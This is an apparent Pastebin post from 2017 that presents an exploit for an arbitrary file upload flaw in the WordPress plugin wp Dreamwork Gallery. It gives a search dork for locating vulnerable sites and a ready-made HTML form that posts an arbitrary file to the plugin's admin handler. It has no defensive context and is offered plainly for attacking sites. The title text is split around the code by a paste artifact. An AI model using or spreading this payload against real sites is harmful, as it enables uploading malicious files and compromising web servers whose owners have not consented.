Advertisement
Mr_HaX0R

Arbitrary File Upload Vulnerability in wp Dreamwork Gallery

Oct 11th, 2017
402
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.74 KB | None | 0 0
  1. Arbitrary File Upload Vulnerability in wp Dreamw# Exploit : Arbitrary File Upload Vulnerability in wp Dreamwork Gallery
  2. </br>
  3. # Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/
  4. </br></br>
  5. #Youtube.com/c/SpiderLinux
  6. #Video : https://www.youtube.com/watch?v=eZMD4bKoqz8
  7.  
  8. <html>
  9. <body>
  10. <form action="http://www.site.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
  11. <input type="hidden" name="task" value="drm_add_new_album" />
  12. <input type="hidden" name="album_name" value="Arbitrary File Upload" />
  13. <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
  14. <input type="file" name="album_img" value="" />
  15. <input type="submit" value="Submit" />
  16. </form>
  17. </body>
  18. </html>ork Gallery
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement